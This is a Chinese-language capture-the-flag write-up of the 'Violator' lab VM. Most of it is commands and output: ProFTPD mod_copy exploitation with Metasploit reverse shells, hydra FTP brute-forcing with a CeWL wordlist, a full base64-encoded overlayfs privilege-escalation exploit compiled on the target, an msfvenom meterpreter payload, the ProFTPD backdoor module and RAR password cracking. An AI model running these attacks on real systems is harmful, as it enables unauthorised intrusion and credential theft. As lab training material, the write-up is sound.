V2AS问路
Write-up-Violator
阅读原文时间:2023年07月08日阅读:1

  • 下载地址:点我

  • Flag:/root/flag.txt

  • 哔哩哔哩:视频

  • 网卡:虚拟机vmnet8

    ➜ ~ ip addr show dev vmnet8
    5: vmnet8: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever

    ➜ ~ nmap -T4 -A 172.16.249.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
    Nmap scan report for 172.16.249.1
    Host is up (0.00013s latency).
    Not shown: 999 closed ports
    PORT STATE SERVICE VERSION
    902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)

    Nmap scan report for 172.16.249.129
    Host is up (0.00035s latency).
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp ProFTPD 1.3.5rc3
    80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: I Say… I say… I say Boy! You pumpin' for oil or somethin'…?
    Service Info: OS: Unix

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds

  1. IP:172.16.249.129,Ubuntu开放端口21和80。主页里有一张图片和一个wiki的链接,可能是突破口。

    ➜ ~ curl -L http://172.16.249.129/
    I Say… I say… I say Boy! You pumpin' for oil or somethin'…?
    I Say.. I say… I say boy! You're barkin up the wrong tree!
    foggie.jpg <-- https://en.wikipedia.org/wiki/Violator_(album) -->

  • 不是WordPress框架,还是用nikto扫一下吧,什么也没发现,看了foggie.jpg的exif信息也没发现。

    ➜ ~ nikto -h http://172.16.249.129/

    - Nikto v2.1.6

    • Target IP: 172.16.249.129
    • Target Hostname: 172.16.249.129
    • Target Port: 80

    + Start Time: 2018-08-06 08:16:20 (GMT8)

    • Server: Apache/2.4.7 (Ubuntu)
    • Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709
    • The anti-clickjacking X-Frame-Options header is not present.
    • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    • No CGI Directories found (use '-C all' to force check all possible dirs)
    • Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    • Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
    • OSVDB-3233: /icons/README: Apache default file found.
    • 7535 requests: 0 error(s) and 7 item(s) reported on remote host

    + End Time: 2018-08-06 08:16:28 (GMT8) (8 seconds)

    • 1 host(s) tested

  1. 所以目标转向了FTP,在nmap的返回结果中可看到ProFTPD 1.3.5rc3,找相关版本是否存在漏洞。

    ➜ ~ searchsploit ProFTPD 1.3.5

    Exploit Title | Path
    | (/home/kali-team/Kali-Team/exploit-database/)

    ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | exploits/linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | exploits/linux/remote/36803.py
    ProFTPd 1.3.5 - File Copy | exploits/linux/remote/36742.txt

  • 三个漏洞都可以利用,这里使用第一个Metasploit框架中的,比较方便。

    msf > use exploit/unix/ftp/proftpd_modcopy_exec
    msf exploit(unix/ftp/proftpd_modcopy_exec) > show options

    Module options (exploit/unix/ftp/proftpd_modcopy_exec):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    Proxies no A proxy chain of format type:host:port[,type:host:port][…]
    RHOST yes The target address
    RPORT 80 yes HTTP port (TCP)
    RPORT_FTP 21 yes FTP port
    SITEPATH /var/www yes Absolute writable website path
    SSL false no Negotiate SSL/TLS for outgoing connections
    TARGETURI / yes Base path to the website
    TMPPATH /tmp yes Absolute writable path
    VHOST no HTTP server virtual host

    Exploit target:

    Id Name
    -- ----
    0 ProFTPD 1.3.5

    msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
    rhost => 172.16.249.129
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
    sitepath => /var/www/html
    msf exploit(unix/ftp/proftpd_modcopy_exec) > run

    [] Started reverse TCP handler on 172.16.249.1:4444 [] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
    [] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server [] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
    [*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800

    ls
    O8hgrL.php
    foggie.jpg
    i0KEqK.php
    index.html

  • 系统是Ubuntu,所以路径设置为/var/www/html,目录下的两个PHP文件就是Metasploit生成的后门。

    whoami
    www-data
    cat /etc/passwd
    root❌0:0:root:/root:/bin/bash
    daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin❌2:2:bin:/bin:/usr/sbin/nologin
    sys❌3:3:sys:/dev:/usr/sbin/nologin
    sync❌4:65534:sync:/bin:/bin/sync
    games❌5:60:games:/usr/games:/usr/sbin/nologin
    man❌6:12:man:/var/cache/man:/usr/sbin/nologin
    lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail❌8:8:mail:/var/mail:/usr/sbin/nologin
    news❌9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy❌13:13:proxy:/bin:/usr/sbin/nologin
    www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
    backup❌34:34:backup:/var/backups:/usr/sbin/nologin
    list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid❌100:101::/var/lib/libuuid:
    syslog❌101:104::/home/syslog:/bin/false
    messagebus❌102:106::/var/run/dbus:/bin/false
    landscape❌103:109::/var/lib/landscape:/bin/false
    dg❌1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
    proftpd❌104:65534::/var/run/proftpd:/bin/false
    ftp❌105:65534::/srv/ftp:/bin/false
    mg❌1001:1001:Martin Gore:/home/mg:/bin/bash
    af❌1002:1002:Andrew Fletcher:/home/af:/bin/bash
    aw❌1003:1003:Alan Wilder:/home/aw:/bin/bash
    uname -a
    Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

  • 发现有几个用户名dg mg af aw,上传到服务器试了,有提权漏洞,但www-data不能用sudo。

    www-data@violator:/var/www/html$ cat /etc/group
    cat /etc/group
    root❌0:
    daemon❌1:
    bin❌2:
    sys❌3:
    adm❌4:syslog,dg
    tty❌5:
    disk❌6:
    lp❌7:
    mail❌8:
    news❌9:
    uucp❌10:
    man❌12:
    proxy❌13:
    kmem❌15:
    dialout❌20:
    fax❌21:
    voice❌22:
    cdrom❌24:dg
    floppy❌25:
    tape❌26:
    sudo❌27:dg
    audio❌29:
    dip❌30:dg
    www-data❌33:
    backup❌34:
    operator❌37:
    list❌38:
    irc❌39:
    src❌40:
    gnats❌41:
    shadow❌42:
    utmp❌43:
    video❌44:
    sasl❌45:
    plugdev❌46:dg
    staff❌50:
    games❌60:
    users❌100:mg,af,aw
    nogroup❌65534:
    libuuid❌101:
    netdev❌102:
    crontab❌103:
    syslog❌104:
    fuse❌105:
    messagebus❌106:
    mlocate❌107:
    ssh❌108:
    landscape❌109:
    dg❌1000:
    lpadmin❌110:dg
    sambashare❌111:dg
    ssl-cert❌112:
    mg❌1001:
    af❌1002:
    aw❌1003:

  • 能sudo的只有dg一个用户,去翻一下各个用户的home目录。然后找到下面的信息。

    www-data@violator:/home/af$ ls
    ls
    minarke-1.21 minarke-1.21.tar.bz2
    www-data@violator:/home/aw$ file hint
    file hint
    hint: ASCII text
    www-data@violator:/home/aw$ cat hint
    cat hint
    You are getting close… Can you crack the final enigma..?
    www-data@violator:/home/aw$
    www-data@violator:/home$ ls dg
    ls dg
    bd
    www-data@violator:/home/mg$ file faith_and_devotion
    file faith_and_devotion
    faith_and_devotion: ASCII text
    www-data@violator:/home/mg$ cat faith_and_devotion
    cat faith_and_devotion
    Lyrics:

    • Use Wermacht with 3 rotors
    • Reflector to B
      Initial: A B C
      Alphabet Ring: C B A
      Plug Board A-B, C-D

    www-data@violator:/home/mg$

  • 全部复制到/var/www/html下载会本地。思路断了,外国的东西看不懂。然后看会了前期发现的wiki。想到了用CeWL把wiki的单词爬下来当字典,爆破那四个用户。CeWL的说明介绍。我其实是把专辑和歌名那一部分去掉空格作为密码字典的。

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

➜  CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
➜  CeWL git:(master) ✗ cat pass.txt |wc -l
10429
➜  CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
[DATA] attacking ftp://172.16.249.129:21/
[21][ftp] host: 172.16.249.129   login: aw   password: sweetestperfection
[21][ftp] host: 172.16.249.129   login: af   password: enjoythesilence
[21][ftp] host: 172.16.249.129   login: mg   password: bluedress
[21][ftp] host: 172.16.249.129   login: dg   password: policyoftruth
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
➜  CeWL git:(master) ✗

  1. 第一种时直接上exp,因为msf拿到的shell没有上传功能,一句话木马好像也不行。所以先把exp.c转为base64,再写到shell里,到了服务器那边再解码成exp.c,然后编译执行。

    ➜ ~ searchsploit -p 39166
    Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
    URL: https://www.exploit-db.com/exploits/39166/
    Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
    File Type: C source, ASCII text, with CRLF line terminators

    ➜ ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c
    ➜ ~ cat exp.c|base64
    LyoNCmp1c3QgYW5vdGhlciBvdmVybGF5ZnMgZXhwbG9pdCwgd29ya3Mgb24ga2VybmVscyBiZWZv
    cmUgMjAxNS0xMi0yNg0KDQojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290DQoj
    IERhdGU6IDIwMTYtMDEtMDUNCiMgRXhwbG9pdCBBdXRob3I6IHJlYmVsDQojIFZlcnNpb246IFVi
    dW50dSAxNC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlDQojIFRlc3RlZCBvbjogVWJ1bnR1IDE0LjA0
    IExUUywgMTUuMTANCiMgQ1ZFIDogQ1ZFLTIwMTUtODY2MA0KDQpibGFoQHVidW50dTp+JCBpZA0K
    dWlkPTEwMDEoYmxhaCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTEwMDEoYmxhaCkNCmJsYWhAdWJ1
    bnR1On4kIHVuYW1lIC1hICYmIGNhdCAvZXRjL2lzc3VlDQpMaW51eCB1YnVudHUgMy4xOS4wLTQy
    LWdlbmVyaWMgIzQ4fjE0LjA0LjEtVWJ1bnR1IFNNUCBGcmkgRGVjIDE4IDEwOjI0OjQ5IFVUQyAy
    MDE1IHg4Nl82NCB4ODZfNjQgeDg2XzY0IEdOVS9MaW51eA0KVWJ1bnR1IDE0LjA0LjMgTFRTIFxu
    IFxsDQpibGFoQHVidW50dTp+JCAuL292ZXJsYXlmYWlsDQpyb290QHVidW50dTp+IyBpZA0KdWlk
    PTAocm9vdCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTAocm9vdCksMTAwMShibGFoKQ0KDQoxMi8y
    MDE1DQpieSByZWJlbA0KDQo2MzU0YjRlMjNkYjIyNWI1NjVkNzlmMjI2ZjJlNDllYzBmZTFlMTli
    DQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzY2hlZC5oPg0KI2luY2x1ZGUg
    PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5j
    bHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMv
    bW91bnQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1
    ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4N
    CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvbW91bnQuaD4NCiNpbmNsdWRl
    IDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0K
    I2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+DQojaW5jbHVkZSA8
    c3lzL3dhaXQuaD4NCg0Kc3RhdGljIGNoYXIgY2hpbGRfc3RhY2tbMTAyNCoxMDI0XTsNCg0Kc3Rh
    dGljIGludA0KY2hpbGRfZXhlYyh2b2lkICpzdHVmZikNCnsNCiAgICBzeXN0ZW0oInJtIC1yZiAv
    dG1wL2hheGhheCIpOw0KICAgIG1rZGlyKCIvdG1wL2hheGhheCIsIDA3NzcpOw0KICAgIG1rZGly
    KCIvdG1wL2hheGhheC93IiwgMDc3Nyk7DQogICAgbWtkaXIoIi90bXAvaGF4aGF4L3UiLDA3Nzcp
    Ow0KICAgIG1rZGlyKCIvdG1wL2hheGhheC9vIiwwNzc3KTsNCg0KICAgIGlmIChtb3VudCgib3Zl
    cmxheSIsICIvdG1wL2hheGhheC9vIiwgIm92ZXJsYXkiLCBNU19NR0NfVkFMLCAibG93ZXJkaXI9
    L2Jpbix1cHBlcmRpcj0vdG1wL2hheGhheC91LHdvcmtkaXI9L3RtcC9oYXhoYXgvdyIpICE9IDAp
    IHsNCglmcHJpbnRmKHN0ZGVyciwibW91bnQgZmFpbGVkLi5cbiIpOw0KICAgIH0NCg0KICAgIGNo
    bW9kKCIvdG1wL2hheGhheC93L3dvcmsiLDA3NzcpOw0KICAgIGNoZGlyKCIvdG1wL2hheGhheC9v
    Iik7DQogICAgY2htb2QoImJhc2giLDA0NzU1KTsNCiAgICBjaGRpcigiLyIpOw0KICAgIHVtb3Vu
    dCgiL3RtcC9oYXhoYXgvbyIpOw0KICAgIHJldHVybiAwOw0KfQ0KDQppbnQNCm1haW4oaW50IGFy
    Z2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgIGludCBzdGF0dXM7DQogICAgcGlkX3Qgd3JhcHBlciwg
    aW5pdDsNCiAgICBpbnQgY2xvbmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7DQogICAg
    c3RydWN0IHN0YXQgczsNCg0KICAgIGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7DQogICAg
    ICAgIGlmKHVuc2hhcmUoQ0xPTkVfTkVXVVNFUikgIT0gMCkNCiAgICAgICAgICAgIGZwcmludGYo
    c3RkZXJyLCAiZmFpbGVkIHRvIGNyZWF0ZSBuZXcgdXNlciBuYW1lc3BhY2VcbiIpOw0KDQogICAg
    ICAgIGlmKChpbml0ID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICBwaWRfdCBwaWQgPQ0K
    ICAgICAgICAgICAgICAgIGNsb25lKGNoaWxkX2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAy
    NCksIGNsb25lX2ZsYWdzLCBOVUxMKTsNCiAgICAgICAgICAgIGlmKHBpZCA8IDApIHsNCiAgICAg
    ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVhdGUgbmV3IG1vdW50IG5h
    bWVzcGFjZVxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgICAgICB9DQoN
    CiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVzLCAwKTsNCg0KICAgICAgICB9DQoNCiAg
    ICAgICAgd2FpdHBpZChpbml0LCAmc3RhdHVzLCAwKTsNCiAgICAgICAgcmV0dXJuIDA7DQogICAg
    fQ0KDQogICAgdXNsZWVwKDMwMDAwMCk7DQoNCiAgICB3YWl0KE5VTEwpOw0KDQogICAgc3RhdCgi
    L3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7DQoNCiAgICBpZihzLnN0X21vZGUgPT0gMHg4OWVkKQ0K
    ICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwiLWMiLCJybSAt
    cmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3VpZCgwLDAsMCk7
    b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7DQoNCiAgICBmcHJpbnRmKHN0
    ZGVyciwiY291bGRuJ3QgY3JlYXRlIHN1aWQgOihcbiIpOw0KICAgIHJldHVybiAtMTsNCn0=
    ➜ ~

  • 在服务器这边把base64解码

    dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
    cat exp.txt|base64 -d >exp.c

    dg@violator:/var/www/html$ gcc exp.c
    gcc exp.c
    dg@violator:/var/www/html$ ls
    ls
    a.out exp.c exp.txt J0dov8.php jc7gX.php vMZTOjJ.php
    dg@violator:/var/www/html$ ./a.out
    ./a.out
    root@violator:/var/www/html# id
    id
    uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
    root@violator:/var/www/html#

  1. 第二种提权的方法,用用户名:dg密码:policyoftruth登上FTP,切换的/var/www/html然后上传Meterpreter-shell。

  • 生成meterpreter-shell,FTP上传直接PUT就可以了

    ➜ ~ msfvenom -p php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
    payload => php/meterpreter_reverse_tcp
    msf exploit(multi/handler) > set lport 7788
    lport => 7788
    msf exploit(multi/handler) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(multi/handler) > run

    [] Started reverse TCP handler on 172.16.249.1:7788 [] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800

  • 这个功能比较多,我平时也是用这个payload的。

    www-data@violator:/var/www/html$ su dg
    su dg
    Password: policyoftruth

    dg@violator:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
    dg@violator:/var/www/html$

  • 上面可以看到proftpd这个守护进程是以root权限运行的,而这东西又刚刚好有漏洞。而且执行不要root密码。我们切换到/home/dg/bd/sbin/proftpd把proftpd以root权限执行起来。接着就是去利用漏洞了。

    dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
    cd /home/dg/bd/sbin/
    dg@violator:~/bd/sbin$ ls
    ls
    ftpscrub ftpshut in.proftpd proftpd
    dg@violator:~/bd/sbin$ ls -al
    ls -al
    total 564
    drwxr-xr-x 2 root root 4096 Jun 6 2016 .
    drwxr-xr-x 10 root root 4096 Jun 6 2016 ..
    -rwxr-xr-x 1 root root 15976 Jun 6 2016 ftpscrub
    -rwxr-xr-x 1 root root 10456 Jun 6 2016 ftpshut
    lrwxrwxrwx 1 root root 7 Jun 6 2016 in.proftpd -> proftpd
    -rwxr-xr-x 1 root root 537488 Jun 6 2016 proftpd
    dg@violator:~/bd/sbin$ sudo ./proftpd
    sudo ./proftpd

    • setting default address to 127.0.0.1
      localhost - SocketBindTight in effect, ignoring DefaultServer
      dg@violator:~/bd/sbin$
      dg@violator:~/bd/sbin$ netstat -antp
      netstat -antp
      (Not all processes could be identified, non-owned process info
      will not be shown, you would have to be root to see it all.)
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
      tcp 0 0 127.0.0.1:2121 0.0.0.0:* LISTEN -
      tcp 0 0 172.16.249.129:60704 172.16.249.1:4444 CLOSE_WAIT -
      tcp 0 0 172.16.249.129:60705 172.16.249.1:4444 CLOSE_WAIT -
      tcp 0 0 172.16.249.129:35623 172.16.249.1:7788 ESTABLISHED 2669/bash
      tcp6 0 0 :::21 :::* LISTEN -
      tcp6 0 0 :::80 :::* LISTEN -
      tcp6 0 0 172.16.249.129:80 172.16.249.1:51132 ESTABLISHED -
      dg@violator:~/bd/sbin$

  • 现在守护进程已经跑起来了,监听的端口是2121,但是只能由127.0.0.1访问,所以要做端口转发。

    meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
    [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

    meterpreter > background
    [*] Backgrounding session 1…
    msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
    set payload cmd/unix/bind_perl
    set payload cmd/unix/bind_perl_ipv6
    set payload cmd/unix/generic
    set payload cmd/unix/reverse
    set payload cmd/unix/reverse_bash_telnet_ssl
    set payload cmd/unix/reverse_perl
    set payload cmd/unix/reverse_perl_ssl
    set payload cmd/unix/reverse_ssl_double_telnet
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
    payload => cmd/unix/reverse_perl
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

    Module options (exploit/unix/ftp/proftpd_133c_backdoor):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 21 yes The target port (TCP)

    Payload options (cmd/unix/reverse_perl):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    LHOST 172.16.249.1 yes The listen address (an interface may be specified)
    LPORT 4444 yes The listen port

    Exploit target:

    Id Name
    -- ----
    0 Automatic

    msf exploit(unix/ftp/proftpd_133c_backdoor) > run

    [-] Exploit failed: The following options failed to validate: RHOST.
    [] Exploit completed, but no session was created. msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121 rport => 2121 msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1 rhost => 127.0.0.1 msf exploit(unix/ftp/proftpd_133c_backdoor) > run [] Started reverse TCP handler on 172.16.249.1:4444
    [] 127.0.0.1:2121 - Sending Backdoor Command [] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800

    id
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

  • 那到root权限了,接下来去夺旗。

    python -c 'import pty;pty.spawn("/bin/bash")'
    root@violator:/# ls
    ls
    bin dev home lib lost+found mnt proc run srv tmp var
    boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
    root@violator:/# cd /root
    cd /root
    root@violator:/root# ls
    ls
    flag.txt
    root@violator:/root# cat flag.txt
    cat flag.txt
    I say… I say… I say boy! Pumping for oil or something…?
    ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
    root@violator:/root#

  • 在root目录下有一个隐藏文件夹,下载回来看看发现有密码。

    root@violator:/root# ll
    ll
    total 24
    drwx------ 3 root root 4096 Jun 14 2016 ./
    drwxr-xr-x 22 root root 4096 Jun 14 2016 ../
    -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
    d--x------ 2 root root 4096 Jun 14 2016 .basildon/
    -rw-r--r-- 1 root root 114 Jun 12 2016 flag.txt
    -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
    root@violator:/root# cd .basildon/
    cd .basildon/
    root@violator:/root/.basildon# ls
    ls
    crocs.rar
    root@violator:/root/.basildon#

    ➜ DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
    Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
    Use the "--format=rar-opencl" option to force loading these as that type instead
    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    World in My Eyes (crocs.rar)
    1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed

  • 密码破解出来是World in My Eyes,别问我怎么知道的,情节需要。现在到隐写

    ➜ DOWNLOAD exiftool artwork.jpg
    ExifTool Version Number : 11.01
    File Name : artwork.jpg
    Directory : .
    File Size : 183 kB
    File Modification Date/Time : 2016:06:12 14:38:12+08:00
    File Access Date/Time : 2018:08:07 21:23:12+08:00
    File Inode Change Date/Time : 2018:08:07 21:23:12+08:00
    File Permissions : rw-r--r--
    File Type : JPEG
    File Type Extension : jpg
    MIME Type : image/jpeg
    JFIF Version : 1.01
    Resolution Unit : inches
    X Resolution : 300
    Y Resolution : 300
    Exif Byte Order : Big-endian (Motorola, MM)
    Image Description : Violator
    Software : Google
    Artist : Dave Gaham
    Copyright : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Exif Version : 0220
    Date/Time Original : 1990:03:19 22:13:30
    Create Date : 1990:03:19 22:13:30
    Sub Sec Time Original : 04
    Sub Sec Time Digitized : 04
    Exif Image Width : 1450
    Exif Image Height : 1450
    XP Title : Violator
    XP Author : Dave Gaham
    XP Keywords : created by user dg
    XP Subject : policyoftruth
    Padding : (Binary data 1590 bytes, use -b option to extract)
    About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
    Rights : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Creator : Dave Gaham
    Subject : created by user dg
    Title : Violator
    Description : Violator
    Warning : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
    Date Acquired : 1941:05:09 10:30:18.134
    Last Keyword XMP : created by user dg
    Image Width : 1450
    Image Height : 1450
    Encoding Process : Baseline DCT, Huffman coding
    Bits Per Sample : 8
    Color Components : 3
    Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
    Image Size : 1450x1450
    Megapixels : 2.1
    Create Date : 1990:03:19 22:13:30.04
    Date/Time Original : 1990:03:19 22:13:30.04
    ➜ DOWNLOAD

  • 版权那两个地方非常突出了,但是又不是base64,然后在mg目录发现的歌词和一个C程序没用上。

Lyrics:

  • Use Wermacht with 3 rotors

  • Reflector to B

    Initial: A B C

    Alphabet Ring: C B A

    Plug Board A-B, C-D

  • 看来那个C程序是解这串字的,但是他卡住了。

    ➜ minarke-1.21 ./minarke

    Minarke, an Enigma M4 emulator
    by John Gilbert

    Emulates the Kriegsmarine M4 Enigma encryption machine

    Initial Setup Notes

    Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them)
    Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
    Ring and position settings: A-Z for each of the 4 rotors
    Reflector setting is always fixed at A.
